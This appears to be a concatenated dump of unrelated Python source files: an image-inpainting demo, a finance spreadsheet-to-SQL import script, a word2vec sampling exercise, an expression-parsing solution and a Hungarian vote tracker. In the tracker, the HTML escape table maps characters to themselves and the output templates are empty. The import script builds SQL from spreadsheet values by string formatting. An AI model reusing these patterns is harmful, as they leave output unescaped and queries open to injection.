op\n\n\n#############################################################################\n# create directory for the output\n\n\n# create directory for the output\nPath(\"output/\").mkdir(parents=True, exist_ok=True)\n\n\n#############################################################################\n# patch shape and weight\n\npatch_shape = (15,15)\npatch_weight = op.gauss_weight(patch_shape,patch_sigma=5).reshape(patch_shape)\nTOL=1.e-4\n\n\n#############################################################################\n# image and mask\n\nimage = img_as_float(imread('./data/image.png')[:,:,0:3])\nmask = imread(\"./data/mask.png\",as_gray=True).astype(np.bool)\n\n#############################################################################\n# example setup\n\nnonlocal_target_mask = binary_dilation( binary_dilation( mask, selem=np.ones((2,2)) ), selem=np.ones(patch_shape) )\nnonlocal_source_mask = nonlocal_target_mask.copy()\nnonlocal_source_mask[patch_shape[0]//2:-patch_shape[0]//2,patch_shape[0]//2:-patch_shape[0]//2] = np.logical_not(nonlocal_target_mask[patch_shape[0]//2:-patch_shape[0]//2,patch_shape[0]//2:-patch_shape[0]//2])\nimage_setup = image.copy()\n# image_setup[mask,0] = 0.95\n# image_setup[mask,1] = 0.80\nimage_setup[mask,0] = 0.75\nimage_setup[mask,1] = 0.0\nimage_setup[mask,2] = 0.0\nimage_setup[nonlocal_source_mask,0] = 0.29\nimage_setup[nonlocal_source_mask,1] = 0.65\nimage_setup[nonlocal_source_mask,2] = 0.12\nalpha = 0.5\nimage_setup[mask,:] = ((1-alpha)*image + alpha*image_setup)[mask,:]\nimage_setup[nonlocal_source_mask,:] = ((1-alpha)*image + alpha*image_setup)[nonlocal_source_mask,:]\nimsave(\"./output/example_setup.png\", op.add_patch(image_setup, patch_weight))\n\nmasked_chair = image.copy()\n# masked_chair[mask,:] = ((1-alpha)*image + alpha*mask.astype(np.float)[:,:,np.newaxis])[mask,:]\nmasked_chair[mask,0] = (1-alpha)*image[mask,0] + alpha*mask.astype(np.float)[mask]\nimsave(\"./output/masked_chair.png\", masked_chair)\n\ninp_region = np.zeros_like(image)\ninp_region[...] = 0.75\ninp_region[mask,:] = 1\nimsave(\"./output/chair_inp_region.png\", inp_region)\n\nconv_mask = binary_dilation( mask, selem=np.ones(patch_shape) )\nnonlocal_target_mask = binary_dilation( conv_mask, selem=np.ones(patch_shape) )\next_inp_region = np.zeros_like(image)\next_inp_region[...] = 0.75\next_inp_region[nonlocal_target_mask,:] = 0.\next_inp_region[nonlocal_target_mask,2] = 0.9\next_inp_region[conv_mask,:] = 0\next_inp_region[conv_mask,1] = 0.9\next_inp_region[mask,:] = 0.5\next_inp_region[mask,0] = 0.95\next_inp_region[20:50,20:50,:] = 0.5\next_inp_region[20:50,20:50,0] = 0.95\next_inp_region[60:90,20:50,:] = 0\next_inp_region[60:90,20:50,1] = 0.9\next_inp_region[100:130,20:50,:] = 0\next_inp_region[100:130,20:50,2] = 0.9\nimsave(\"./output/chair_ext_inp_region.png\", ext_inp_region)\n# exit()\n\n\n#############################################################################\n# make lambda from edges\n\nasympt_val = 0.1\ndecay_time = 10\n\nedges = imread(\"./data/edges.png\",as_gray=True).astype(np.bool)\nedge_coef = (1-asympt_val) * np.exp(-ndi.distance_transform_edt(1-edges)/decay_time) + asympt_val\nedge_coef = 1 - edge_coef\nedge_coef /= np.amax(edge_coef)\nedge_coef[edge_coef<1.e-6] = 1.e-4\nimsave(\"./output/edges_coef.png\",img_as_float(edge_coef))\n\ncolor_edges = image.copy()\ncolor_edges[mask,:] = 1\ncolor_edges[edges,0] = 0\ncolor_edges[edges,1] = 0.4\ncolor_edges[edges,2] = 1\ncolor_edges[np.logical_and(edges,mask),0] = 1\ncolor_edges[np.logical_and(edges,mask),1] = 0\ncolor_edges[np.logical_and(edges,mask),2] = 0\nimsave(\"./output/color_edges.png\", color_edges)\n# exit()\n\n\n#############################################################################\n# Patch nonlocal means\n\nkernels = [[[1]]]\nlambdas = [1]\nproblem = Inpainting(image, mask, as_gray=False, kernels=kernels, lambdas=lambdas, patch_shape=patch_shape, patch_weight=patch_weight)\nresult = problem.process(num_scales=1, initialization='harmonic', TOL=TOL)\nimsave(\"./output/means.png\", op.add_patch(result, patch_weight))\n# exit()\n\n\n#############################################################################\n# Local PDE inpainting\n\nharmonic = image.copy()\nInpainting.inpaint_PDE(None, np.moveaxis(harmonic,-1,0), mask, 'harmonic')\nimsave(\"./output/harmonic.png\", harmonic)\n# exit()\n\n# with edge completion\nharmonic_edges = image.copy()\nInpainting.inpaint_PDE(None, np.moveaxis(harmonic_edges,-1,0), mask, 'harmonic', edge_coef)\nimsave(\"./output/harmonic_edges.png\", harmonic_edges)\n# exit()\n\n\n#############################################################################\n# Patch nonlocal Poisson\n\nkernels = op.grad_kernels(\"forward\")\nlambdas = [1.0,1.0]\nproblem = Inpainting(image, mask, as_gray=False, kernels=kernels, lambdas=lambdas, patch_shape=patch_shape, patch_weight=patch_weight)\nresult = problem.process(num_scales=1, initialization=harmonic, TOL=TOL)\nimsave(\"./output/nonloc_harmonic.png\", op.add_patch(result, patch_weight))\n# exit()\n\n# with edge completion\nkernels = op.grad_kernels(\"forward\")\nlambdas = [edge_coef,edge_coef]\nproblem = Inpainting(image, mask, as_gray=False, kernels=kernels, lambdas=lambdas, patch_shape=patch_shape, patch_weight=patch_weight)\nresult = problem.process(num_scales=1, initialization=harmonic_edges, TOL=TOL)\nimsave(\"./output/nonloc_harmonic_edges.png\", op.add_patch(result, patch_weight))\n# exit()","repo_name":"vreshniak/feature-driven-exemplar-inpainting","sub_path":"examples/example_3/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":5636,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"74972136100","text":"import pandas as pd\nimport numpy as np\nfrom sql_setting import *\nfrom openpyxl import load_workbook\nimport openpyxl\n\ndef orignal_import(file_path=\"D:\\\\1何军\\\\财务系统\\\\系统导出数据\",log_name=\"log.csv\",del_name=\"del.csv\"):\n # 系统原始数据导入\n log_table = pd.read_csv(r\"{}\\{}\".format(file_path,log_name))\n log_table.to_sql(\"user_account_integral_log\", engine, if_exists=\"replace\", index=False)\n del_table = pd.read_csv(r\"{}\\{}\".format(file_path, del_name))\n del_table.to_sql(\"user_account_integral_del\", engine, if_exists=\"replace\", index=False)\n sql = 'UPDATE user_account_integral_del SET action_id = \"107\" ,action_name = \"EVOS购车客户定向权益\" ' \\\n 'WHERE user_id = 66670 and action_id = 112'\n cursor.execute(sql)\n cursor.commit()\n print(\"数据导入完成\")\n\n\n\n\ndef jingdong_import(file_path,jingdong_name,sheet_name):\n # 京东对账单原始数据导入\n jingdong = pd.read_excel(r\"{}\\{}\".format(file_path,jingdong_name),sheet_name=sheet_name)\n if \"退款金额\" in jingdong.columns:\n jingdong[\"实际支付金额\"] = jingdong[\"商品含税总额\"] - jingdong[\"退款金额\"]\n else:\n jingdong[\"实际支付金额\"] = jingdong[\"商品含税总额\"]\n filter_str = ['业务单号(子订单号)', '原始订单号', '下单时间', '商品类型', '商品编号', '商品名称', '商品税率', '商品数量', '商品含税单价',\n '商品含税总额', \"实际支付金额\"]\n rename_dict = {\"业务单号(子订单号)\": \"child_number\", \"原始订单号\": \"origin_number\", \"下单时间\": \"order_time\",\n \"商品类型\": \"business_type\", \"商品编号\": \"business_code\",\n \"商品名称\": \"business_name\", \"商品税率\": \"business_tax\", \"商品数量\": \"jbussiness_number\",\n \"商品含税单价\": \"bussiness_tax_price\", \"商品含税总额\": \"business_total_tax_price\",\n \"实际支付金额\": \"pay_price\"}\n if \"月份\" in jingdong.columns.tolist():\n filter_str.append(\"月份\")\n rename_dict[\"月份\"] = \"filter_month\"\n jingdong = jingdong[filter_str]\n # '商品未税总额(未税单价*数量)', '商品未税单价',\n jingdong.rename(columns=rename_dict, inplace=True)\n jingdong[\"child_number_code\"] = jingdong.apply(lambda x: \"jd\" + str(x[\"child_number\"])+str(x[\"business_code\"]),axis=1)\n # business = jingdong[jingdong[\"business_type\"] != \"运费\"]\n jingdong.reset_index(drop=True,inplace=True)\n jingdong.to_sql(\"jingdong\", engine, if_exists=\"replace\")\n # \"商品未税总额(未税单价*数量)\": \"business_total_price\",\n # \"商品未税单价\": \"bussiness_price\",\n # 运费分摊到每个商品上面\n\n # jingdong[[\"origin_number\", \"business_code\"]] = jingdong[[\"origin_number\", \"business_code\"]].astype(str)\n # jingdong[\"business_code\"] = jingdong[\"business_code\"].apply(lambda x: str(x).replace(\"fre\", \"\"))\n # jingdong[\"Identification_code\"] = jingdong[\"origin_number\"] + jingdong[\"business_code\"]\n #\n # freight = jingdong[jingdong[\"business_type\"] == \"运费\"][[\"Identification_code\",\"origin_number\", \"business_code\",\n # \"bussiness_tax_price\"]]\n #\n # freight.drop([\"origin_number\",\"business_code\"],axis=1,inplace=True)\n # freight.rename(columns={\"bussiness_tax_price\":\"flow_fee\"},inplace=True)\n # business = jingdong[jingdong[\"business_type\"] != \"运费\"]\n # 原始运费重构\n # count_number = pd.pivot_table(business, index=\"origin_number\", values=\"bussiness_number\", aggfunc=np.sum)\n #\n # count_number.reset_index(inplace=True)\n\n # freight = pd.pivot_table(freight,index=\"origin_number\", values=\"business_total_tax_price\", aggfunc=np.sum)\n #\n #\n # freight = pd.merge(count_number, freight, how=\"left\", left_on=\"origin_number\",right_on=\"origin_number\")\n #\n # freight.columns = [\"origin_number\", \"bussiness_total_number\", \"flow_fee\"]\n # freight.fillna(0, inplace=True)\n # freight.to_excel(\"yunfei.xlsx\")\n # business.to_excel(\"diyi.xlsx\")\n # result = pd.merge(business, freight, how=\"left\", on=\"Identification_code\")\n # result.fillna(0,inplace=True)\n # result[\"real_pay_price\"] = result[\"flow_fee\"] / result[\"bussiness_total_number\"] * result[\"bussiness_number\"] + \\\n # result[\"pay_price\"]\n\n # result[\"real_pay_price\"] = result.loc[:,\"bussiness_tax_price\"] + result.loc[:,\"flow_fee\"]\n #\n # result.to_sql(\"jingdong\", engine, if_exists=\"replace\")\n\n\ndef jingdong_relationship(file_path,file_name,sheet_list):\n # 京东对应关系表导入\n i=0\n for sheet in sheet_list:\n relation_file = pd.read_excel(r\"{}\\{}\".format(file_path, file_name),sheet_name=sheet)\n relation_file = relation_file[['京东订单号', '订单号', '电话', '商品编号','商品名', '商城单价', '数量', '商品品类']]\n # '物流单号',\n relation_file.rename(columns={'京东订单号': 'child_number',\n '订单号': 'business_id', '电话': 'oder_phone', '商品编号':'business_code','商品名': 'business_name',\n '商城单价': 'business_price', '数量': 'business_number', '商品品类': 'business_type'},\n inplace=True)\n relation_file = relation_file.astype(str)\n relation_file[\"business_id_code\"] = relation_file.apply(lambda x: str(x['business_id'])+str(x['business_code']).replace(\" \",\"\"),axis=1)\n relation_file['child_number_code'] = relation_file.apply(lambda x: \"jd\"+str(x['child_number'])+str(x['business_code']).replace(\" \",\"\"),axis=1)\n # '物流单号': ' logistics_number',\n if i == 0:\n relation_file.to_sql(\"guanxi\", engine, if_exists=\"replace\",index=False)\n i+=4\n else:\n relation_file.to_sql(\"guanxi\", engine, if_exists=\"append\", index=False)\n\ndef action_relationship(file_path,file_name,sheet_name):\n # pid关系导入 禁用\n pid = pd.read_excel(r\"{}\\{}\".format(file_path,file_name), sheet_name=sheet_name)\n pid = pid[['对应活动action_id', 'program_id', '对应活动action_name', '有偿无偿']]\n pid.rename(columns={'对应活动action_id': 'action_id', 'program_id': 'program_id', '对应活动action_name': 'action_name',\n '有偿无偿': 'judge'}, inplace=True)\n pid.to_sql(\"action_programid\",engine, if_exists=\"replace\", index=False)\n\ndef pid_aid(file_path=\"D:\\\\1何军\\\\财务系统\\\\系统导出数据\",file_name=\"Program_ID与Action_ID对应关系表导入版本.xlsx\"):\n # pid和action_id的对应关系导入\n\n sql = \"TRUNCATE action_program\"\n cursor.execute(sql)\n cursor.commit()\n wt = load_workbook(filename=r\"{}\\{}\".format(file_path,file_name))\n common_2021 = wt[\"2021年\"]\n common_2022 = wt[\"2022常规行为\"]\n active_2022 = wt[\"2022其他行为\"]\n for i in range(2,common_2021.max_row):\n if common_2021.cell(row=i,column=1).value:\n sql = \"INSERT INTO action_program(action_id,action_name,\" \\\n \"program_id,integral_judge,action_type,use_type,start_month,end_month) VALUES ('{}','{}','{}','{}','{}','{}','{}','{}') \"\\\n .format(common_2021.cell(row=i,column=1).value,common_2021.cell(row=i,column=3).value,\n common_2021.cell(row=i,column=2).value,common_2021.cell(row=i,column=4).value,\n common_2021.cell(row=i,column=5).value,common_2021.cell(row=i,column=6).value,\n \"2021-01\",\"2021-12\")\n cursor.execute(sql)\n else:\n break\n cursor.commit()\n for i in range(2,common_2022.max_row):\n if common_2022.cell(row=i,column=1).value:\n sql = \"INSERT INTO action_program(action_id,action_name,\" \\\n \"program_id,integral_judge,action_type,use_type,start_month,end_month) VALUES ('{}','{}','{}','{}','{}','{}','{}','{}') \"\\\n .format(common_2022.cell(row=i,column=1).value,common_2022.cell(row=i,column=2).value,\n common_2022.cell(row=i,column=6).value,common_2022.cell(row=i,column=3).value,\n common_2022.cell(row=i,column=4).value,common_2022.cell(row=i,column=5).value,\n \"2022-01\",\"2022-03\")\n cursor.execute(sql)\n sql1 = \"INSERT INTO action_program(action_id,action_name,\" \\\n \"program_id,integral_judge,action_type,use_type,start_month,end_month) VALUES ('{}','{}','{}','{}','{}','{}','{}','{}') \" \\\n .format(common_2022.cell(row=i, column=1).value, common_2022.cell(row=i, column=2).value,\n common_2022.cell(row=i, column=7).value, common_2022.cell(row=i, column=3).value,\n common_2022.cell(row=i, column=4).value, common_2022.cell(row=i, column=5).value,\n \"2022-04\", \"2022-06\")\n cursor.execute(sql1)\n sql1 = \"INSERT INTO action_program(action_id,action_name,\" \\\n \"program_id,integral_judge,action_type,use_type,start_month,end_month) VALUES ('{}','{}','{}','{}','{}','{}','{}','{}') \" \\\n .format(common_2022.cell(row=i, column=1).value, common_2022.cell(row=i, column=2).value,\n common_2022.cell(row=i, column=8).value, common_2022.cell(row=i, column=3).value,\n common_2022.cell(row=i, column=4).value, common_2022.cell(row=i, column=5).value,\n \"2022-07\", \"2022-09\")\n cursor.execute(sql1)\n else:\n break\n cursor.commit()\n for i in range(2,active_2022.max_row):\n if active_2022.cell(row=i, column=1).value:\n sql = \"INSERT INTO action_program(action_id,action_name,\" \\\n \"program_id,integral_judge,action_type,use_type,start_month,end_month) VALUES ('{}','{}','{}','{}','{}','{}','{}','{}') \" \\\n .format(active_2022.cell(row=i, column=1).value, active_2022.cell(row=i, column=3).value,\n active_2022.cell(row=i, column=2).value, active_2022.cell(row=i, column=4).value,\n active_2022.cell(row=i, column=5).value, active_2022.cell(row=i, column=6).value,\n \"2022-01\", \"2023-04\")\n print(active_2022.cell(row=i, column=1).value)\n cursor.execute(sql)\n else:\n break\n cursor.commit()\n\ndef fuyu_jingdong(file_path=\"D:\\\\1何军\\\\财务系统\\\\系统导出数据\",file_name=\"商城订单1.xlsx\"):\n # 福域订单导入\n fuyu = pd.read_excel(r\"{}\\{}\".format(file_path,file_name),converters={\"实际单价\": int,\"数量\":int,\"来源spu\":str})\n # fuyu = fuyu[(fuyu[\"订单状态\"] != 7) & (fuyu[\"退款状态\"] != 1) & (fuyu[\"订单状态\"] != 4)]\n fuyu = fuyu[fuyu[\"退款状态\"] != 1]\n fuyu = fuyu[[\"订单号\",\"供货商\",\"SKU\",\"数量\",\"来源spu\",\"实际单价\",\"商品名称\",\"订单状态\"]]\n fuyu.rename(columns={\"订单号\":\"business_id\",\"供货商\":\"business_channel\",\"SKU\":\"sku\",\n \"数量\":\"business_quantity\",\"来源spu\":\"spu\",\"实际单价\":\"business_price\",\n \"订单状态\":\"order_statue\",\"商品名称\":\"business_name\"},inplace=True)\n # print(fuyu.info)\n # fuyu[\"business_single_price\"] = fuyu[\"business_price\"]-fuyu[\"business_quantity\"]\n\n fuyu.reset_index(drop=True,inplace=True)\n fuyu[\"business_id_code\"] = fuyu.apply(lambda x: str(x[\"business_id\"])+str(x[\"spu\"]),axis=1)\n\n # fuyu[\"business_id\"] = fuyu[\"business_id\"].apply(lambda x: str(x).split(\"_\")[0])\n\n fuyu.to_sql(\"business_relationship\",engine,if_exists=\"replace\")\n sql = 'UPDATE business_relationship set spu=\"5237209\" WHERE business_id=\"M0577127583677861888\" and spu = \"5158704\"'\n cursor.execute(sql)\n cursor.commit()\n\ndef fuyu_skuinfo(file_path=\"D:\\\\1何军\\\\财务系统\\\\系统导出数据\",file_name=\"商城订单sku.csv\"):\n fuyu = pd.read_csv(r\"{}\\{}\".format(file_path, file_name))\n fuyu = fuyu[fuyu[\"refund_stauts\"] != 1]\n # fuyu = fuyu[fuyu[\"send_num\"].notnull()]\n fuyu = fuyu[[\"order_no\", \"buy_num\", \"sku_code\", \"shared_fb\", \"spu_name\", \"business_channel\"]]\n fuyu.rename(columns={\"order_no\": \"business_id\", \"business_channel\": \"business_channel\", \"sku_code\": \"sku\",\n \"buy_num\": \"business_quantity\", \"shared_fb\": \"business_price\",\n \"spu_name\": \"business_name\"}, inplace=True)\n\n fuyu.reset_index(drop=True, inplace=True)\n\n # fuyu[\"business_id\"] = fuyu[\"business_id\"].apply(lambda x: str(x).split(\"_\")[0])\n fuyu.to_sql(\"business_relationship\", engine, if_exists=\"replace\")\n\ndef caiwu_account(file_path=\"D:\\\\1何军\\\\财务系统\",file_name=\"积分原始数据.xlsx\"):\n # 积分原始对账数据\n caiwu = pd.read_excel(r\"{}\\{}\".format(file_path,file_name),dtype={\"sale_month\": str})\n six_caiwu = pd.read_excel(r\"{}\\{}\".format(file_path,\"6原始数据.xlsx\"),dtype={\"sale_month\": str})\n seven_caiwu = pd.read_excel(r\"{}\\{}\".format(file_path, \"7原始数据.xlsx\"), dtype={\"sale_month\": str})\n sum_caiwu = pd.concat([caiwu,six_caiwu,seven_caiwu],axis=0)\n sum_caiwu[\"sale_month\"] = sum_caiwu[\"sale_month\"].apply(lambda x: str(x)[:7])\n sum_caiwu.reset_index(drop=True,inplace=True)\n sum_caiwu.to_sql(\"caiwu_account\",engine, if_exists=\"replace\")\n\ndef dashang_import():\n sibada = pd.read_excel(r\"D:\\1何军\\财务系统\\系统导出数据\\dashang.xlsx\")\n sibada.to_sql(\"dashang\", engine, if_exists=\"replace\", index=False)\n\nif __name__==\"__main__\":\n # 原始数据导入\n # orignal_import()\n # fuyu_jingdong()\n # fuyu_skuinfo()\n # action_id 和progra_id对应关系导入\n # pid_aid()\n # caiwu_account()\n # 打赏\n # dashang_import()\n # fuyu_jingdong()\n #京东原始数据导入\n jingdong_import(file_path=\"D:\\\\1何军\\\\财务对账\\\\4月\",jingdong_name=\"京东原始数据0325-0424.xlsx\",sheet_name=\"Sheet1\")\n # 闫浩的关系导入\n # jingdong_relationship(file_path=\"D:\\\\1何军\\\\财务系统\",file_name=\"福域积分商城订单明细表(1月-6月).xlsx\",\n # sheet_list=[\"1月\",\"2月\",\"3月\",\"4月\",\"5月\",\"6月\"])\n # jingdong_import(file_path=\"D:\\\\1何军\\\\京东数据\\\\2报账单\",jingdong_name=\"1-5月原始数据汇总.xlsx\",sheet_name=\"Sheet1\")\n\n\n\n","repo_name":"cornelius-git/salesdata","sub_path":"salesdata/business/data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":14505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38829168948","text":"import sys\nimport ast\nimport numpy as np\n\n\ndef parse_array(s):\n return np.array(ast.literal_eval(s))\n\ndef read_array():\n return parse_array(sys.stdin.readline())\n\ndef write_array(arr):\n print(repr(arr.tolist()))\n\n\ndef generate_w2v_sgns_samples(text, window_size, vocab_size, ns_rate):\n \"\"\"\n text - list of integer numbers - ids of tokens in text\n window_size - odd integer - width of window\n vocab_size - positive integer - number of tokens in vocabulary\n ns_rate - positive integer - number of negative tokens to sample per one positive sample\n\n returns list of training samples (CenterWord, CtxWord, Label)\n \"\"\"\n samples = []\n for i in range(len(text)):\n for j in range(i - window_size // 2, i + window_size // 2 + 1):\n if j < 0 or j >= len(text) or j == i:\n continue\n samples.append((text[i], text[j], 1))\n for _ in range(ns_rate):\n # negative samples\n samples.append((text[i], np.random.randint(0, vocab_size), 0))\n return samples\n\n\n# text = read_array()\n# window_size = int(sys.stdin.readline().strip())\n# vocab_size = int(sys.stdin.readline().strip())\n# ns_rate = int(sys.stdin.readline().strip())\ntext = [1,2,3,4]\nwindow_size = 3\nvocab_size = 5\nns_rate = 2\n\nresult = generate_w2v_sgns_samples(text, window_size, vocab_size, ns_rate)\n\nwrite_array(np.array(result))","repo_name":"Vechtomov/stepik-dl-nlp","sub_path":"solutions/task_3_4_1.py","file_name":"task_3_4_1.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"10235587876","text":"import sys\ninput = sys.stdin.readline\n\nS = input().rstrip()\n\nnums = []\ncals = []\nnum = 0\n\nfor s in S:\n if s.isdigit():\n num = num*10 + int(s)\n else:\n nums.append(num)\n num = 0\n cals.append(s)\nnums.append(num)\n\n# print(nums)\n# print(cals)\n\nans = nums[0]\n_minus = False\n\nfor i in range(len(cals)):\n if cals[i] == '+':\n if _minus:\n ans -= nums[i+1]\n else:\n ans += nums[i+1]\n elif cals[i] == '-':\n ans -= nums[i+1]\n _minus = True\n\nprint(ans)","repo_name":"ByeonghwiJeong/Algorithm_Study","sub_path":"05_Study/Chung_Ang/18_그리디_22-08-03/04_1541.py","file_name":"04_1541.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"43530414700","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport sqlite3\nimport re\n\ndb = None\nc = None\nplus_sender = 2\nplus_receiver = 10\nminus_sender = -1\nminus_receiver = -2\n\n\ndef prepare_db():\n \"\"\"Prepares the database: connect, prepare cursor\"\"\"\n global db, c\n db = sqlite3.connect('vakstars.sqlite')\n db.row_factory = sqlite3.Row\n c = db.cursor()\n\n\ndef leave_db():\n \"\"\"Ends database connection\"\"\"\n c.close()\n\n\ndef natural_date_to_sql_datestring(natural_date):\n matches = re.match(r\"([0-9]*)[^0-9]*([0-9]*)[^0-9]*([0-9]*)[^0-9]*\", natural_date)\n datestring = \"{year}-{month}-{day}\".format(year=matches.group(1),\n month=matches.group(2),\n day=matches.group(3))\n return datestring\n\n\ndef insert_profile(name, startdate):\n \"\"\"Inserts a new profile.\"\"\"\n # TODO: set a sensible startdate as default\n # Check for minimum length\n if len(name) < 3:\n raise Exception('Túl rövid a név!')\n global c, db\n c.execute(\"\"\"\n INSERT INTO profiles(name, startdate)\n VALUES (:name, :startdate)\n \"\"\",\n {'name': name, 'startdate': startdate})\n db.commit()\n\n\ndef delete_votes_by_profile_id(id):\n \"\"\"Deletes all votes (given and received) for a profile id.\"\"\"\n global c, db\n c.execute(\"\"\"\n DELETE FROM votes\n WHERE sender = :id OR receiver = :id\n \"\"\", {'id': id})\n db.commit()\n\n\ndef delete_profile(id):\n \"\"\"Deletes a profile by id.\"\"\"\n global c, db\n c.execute(\"\"\"\n DELETE FROM profiles\n WHERE id = :id\n \"\"\", {'id': id})\n db.commit()\n delete_votes_by_profile_id(id)\n\n\ndef profile_id_by_name(name):\n \"\"\"Returns profile id by name.\"\"\"\n global c\n c.execute(\"\"\"\n SELECT COUNT(name) AS count FROM profiles\n WHERE name = :name\n \"\"\", {'name': name})\n count = c.fetchone()['count']\n\n if count != 1:\n return None\n else:\n c.execute(\"\"\"\n SELECT id\n FROM profiles WHERE name = :name\n \"\"\", {'name': name})\n return c.fetchone()['id']\n\n\ndef profile_name_by_id(id):\n \"\"\"Returns name by id.\"\"\"\n global c\n c.execute(\"\"\"\n SELECT name\n FROM profiles WHERE id = :id\n \"\"\", {'id': id})\n return c.fetchone()['name']\n\n\ndef vote(sender, receivers, date, reason, type=\"1\"):\n \"\"\"File(s) vote(s).\n\n If the receivers is iterable, everyone in the list will receive a vote.\n \"\"\"\n if hasattr(receivers, '__iter__'):\n [vote(sender, receiver, date, reason, type) for receiver in receivers]\n else:\n global c, db\n c.execute(\"\"\"\n INSERT INTO votes(sender, receiver, date, reason, type)\n VALUES (:sender, :receiver, :date, :reason, :type)\n \"\"\",\n {'sender': sender, 'receiver': receivers,\n 'date': date, 'reason': reason, 'type': type})\n db.commit()\n\ndef get_vote_log(start_date=None, end_date=None):\n \"\"\"Creates vote log dict from db.\"\"\"\n global c, db\n\n vote_log = []\n points = {}\n\n if start_date is None and end_date is None:\n c.execute(\"\"\"\n SELECT type, sender, receiver, date, reason\n FROM votes\n \"\"\")\n else:\n c.execute(\"\"\"\n SELECT type, sender, receiver, date, reason\n FROM votes\n WHERE date(date) >= date(:start_date) and\n date(date) <= date(:end_date)\n \"\"\",\n {'start_date': start_date, 'end_date': end_date})\n for row in c:\n if row[\"sender\"] not in points:\n points[row[\"sender\"]] = 0\n\n if row[\"receiver\"] not in points:\n points[row[\"receiver\"]] = 0\n\n sender_original_points = points[row[\"sender\"]]\n receiver_original_points = points[row[\"receiver\"]]\n\n global plus_sender, plus_receiver, minus_sender, minus_receiver\n if row[\"type\"] == 1:\n points[row[\"sender\"]] += plus_sender\n points[row[\"receiver\"]] += plus_receiver\n if row[\"type\"] == -1:\n points[row[\"sender\"]] += minus_sender\n points[row[\"receiver\"]] += minus_receiver\n\n vote = {\n 'date': row[\"date\"],\n 'type': row[\"type\"],\n 'sender': row[\"sender\"],\n 'receiver': row[\"receiver\"],\n 'reason': row[\"reason\"],\n 'sender_points_before': sender_original_points,\n 'sender_points_after': points[row[\"sender\"]],\n 'receiver_points_before': receiver_original_points,\n 'receiver_points_after': points[row[\"receiver\"]],\n }\n vote_log.append(vote)\n return {'vote_log': vote_log, 'points': points}\n\n\nhtml_escape_table = {\n \"&\": \"&\",\n '\"': \""\",\n \"'\": \"'\",\n \">\": \">\",\n \"<\": \"<\",\n}\n\n\ndef html_escape(text):\n \"\"\"Produce entities within text.\"\"\"\n return \"\".join(html_escape_table.get(c, c) for c in text)\n\n\ndef vote_log_to_log_table_html(vote_log):\n \"\"\"Returns the log table in HTML.\"\"\"\n for row in reversed(vote_log['vote_log'][-100:]):\n if row[\"type\"] == 1:\n typesign = \"+\"\n else:\n typesign = \"-\"\n print('' \\\n '' \\\n '' \\\n '' \\\n ''.format(\n date=row[\"date\"].encode('utf-8'),\n type=typesign,\n sender=profile_name_by_id(row[\"sender\"]).encode('utf-8'),\n sender_points_before=row[\"sender_points_before\"],\n sender_points_after=row[\"sender_points_after\"],\n receiver=profile_name_by_id(row[\"receiver\"]).encode('utf-8'),\n receiver_points_before=row[\"receiver_points_before\"],\n receiver_points_after=row[\"receiver_points_after\"],\n reason=html_escape(row['reason'].encode('utf-8'))\n ))\n\n\ndef vote_log_to_points_table_html(vote_log):\n \"\"\"Returns the sorted points table in HTML.\"\"\"\n sorted_votelog = sorted(\n vote_log['points'].items(),\n key=lambda x: x[1],\n reverse=True\n )\n position = 0\n previous = None\n for profile in sorted_votelog:\n if position == 0 or (previous != None and previous != profile[1]):\n position += 1\n print(\"{list_position}. {name} - {points}\".format(\n list_position=position,\n name=profile_name_by_id(profile[0]).encode('utf-8'),\n points=profile[1]\n ))\n previous = profile[1]\n\ndef import_tsv(filename):\n import csv\n\n with open(filename, 'rb') as tsvfile:\n tsvreader = csv.reader(tsvfile, delimiter='\\t')\n tsvreader.next()\n names = []\n for row in tsvreader:\n names.append(row[0])\n names.append(row[1])\n nameset = set(names)\n unregistered = []\n for name in nameset:\n if profile_id_by_name(name.decode('utf-8')) is None:\n unregistered.append(name)\n if len(unregistered) > 0:\n print(\"A következők nem szerepelnek az adatbázisban, manuálisan kell őket regisztránod:\")\n for name in unregistered:\n print(name)\n else:\n tsvfile.seek(0)\n tsvreader.next()\n votes = 0\n for row in tsvreader:\n sender = profile_id_by_name(row[0].decode('utf-8'))\n receiver = profile_id_by_name(row[1].decode('utf-8'))\n reason = row[2].decode('utf-8')\n date = natural_date_to_sql_datestring(row[3].decode('utf-8'))\n vote(sender, receiver, date, reason)\n votes += 1\n print(\"Sikeresen felvittem {number_of_votes} szavazatot.\".format(number_of_votes=votes))\n\n\ndef help():\n print(\"\"\"Használat:\n vakstars.py register \n vakstars.py vote <+|-> \n vakstars.py vote <+|-> [ ... ] \n vakstars.py tsv-import <.tsv fájl>\n vakstars.py dump-log-table\n vakstars.py dump-points-table\n vakstars.py dump-daterange-stat \n \"\"\")\n\n\ndef select_operation(operation):\n operations = ['dump-log-table',\n 'dump-points-table',\n 'dump-daterange-stat',\n 'register',\n 'vote',\n 'tsv-import']\n if operation not in operations:\n raise Exception('Ilyen műveletünk nincs is!')\n else:\n prepare_db()\n if operation == \"dump-log-table\":\n vote_log_to_log_table_html(get_vote_log())\n\n if operation == \"dump-points-table\":\n vote_log_to_points_table_html(get_vote_log())\n\n if operation == \"dump-daterange-stat\":\n start_date = natural_date_to_sql_datestring(sys.argv[2].decode('utf-8'))\n end_date = natural_date_to_sql_datestring(sys.argv[3].decode('utf-8'))\n vote_log_to_points_table_html(get_vote_log(start_date, end_date))\n\n if operation == \"register\":\n name = sys.argv[2].decode('utf-8')\n date = natural_date_to_sql_datestring(sys.argv[3].decode('utf-8'))\n insert_profile(name, date)\n\n if operation == \"tsv-import\":\n filename = sys.argv[2].decode('utf-8')\n import_tsv(filename)\n\n if operation == \"vote\":\n type = None\n sign = sys.argv[2]\n if sign == \"+\":\n type = 1\n if sign == \"-\":\n type = -1\n\n sender = profile_id_by_name(sys.argv[3].decode('utf-8'))\n if sys.argv[4] != \"[\":\n receivers = profile_id_by_name(sys.argv[4].decode('utf-8'))\n argument_continue = 5\n else:\n found = False\n found_at = 0\n 